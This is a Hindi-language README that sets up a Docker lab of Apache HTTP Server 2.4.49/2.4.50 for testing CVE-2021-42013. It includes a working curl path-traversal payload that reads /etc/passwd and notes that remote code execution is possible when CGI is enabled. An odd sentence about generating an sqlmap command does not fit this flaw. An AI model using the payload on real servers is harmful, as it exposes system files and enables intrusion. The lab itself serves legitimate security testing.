
CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Apache 2.4.49 और 2.4.50 में पथ ट्रैवर्सल या रिमोट कोड निष्पादन कमजोरियाँ
यह परियोजना Docker का उपयोग करके एक विशिष्ट भेद्यता को डॉकरीकृत करने का लक्ष्य रखती है। उद्देश्य एक पृथक वातावरण बनाना है जिसमें भेद्यता का सुरक्षित रूप से शोषण और परीक्षण किया जा सके।
Apache HTTP Server 2.4.50 - Remote Code Execution && Path Transversal
इस परियोजना को चलाने के लिए, आपके मशीन पर निम्नलिखित होना चाहिए:
एक बार पूर्वापेक्षाएँ स्थापित हो जाने पर, आप इस Git रिपॉजिटरी को अपने मशीन पर क्लोन कर सकते हैं:
git clone https://github.com/cybfar/cve-2021-42013-httpd.git
cd Ccve-2021-42013-httpd
एक बार निर्देशिका में आने पर, नीचे दिए गए कमांड को चलाकर भेद्य वातावरण तैयार करें:
docker build -t apache-httpd-vuln .
docker run -p 8000:80 apache-httpd-vuln
फिर http://localhost:8000 पते पर एप्लिकेशन तक पहुँचें। यदि सब ठीक रहा, तो आपको "It works" प्रदर्शित होता दिखाई देना चाहिए।
curl के साथ इस पेलोड को नीचे चलाने से हमें पता चलता है कि लक्ष्य भेद्य है। स्क्रिप्ट भेद्यता का शोषण करने के लिए उपयुक्त sqlmap कमांड उत्पन्न करेगी।
curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
यह पेलोड उपयोगकर्ता की सहमति के बिना सिस्टम में उपयोगकर्ता से संबंधित जानकारी तक सीधे पहुँच सकता है।
एक बार जब हम सर्वर पर cgi या cgid मॉड्यूल सक्रिय कर देंगे, तो यह भेद्यता एक हमलावर को मनमानी कमांड निष्पादित करने की अनुमति देगी।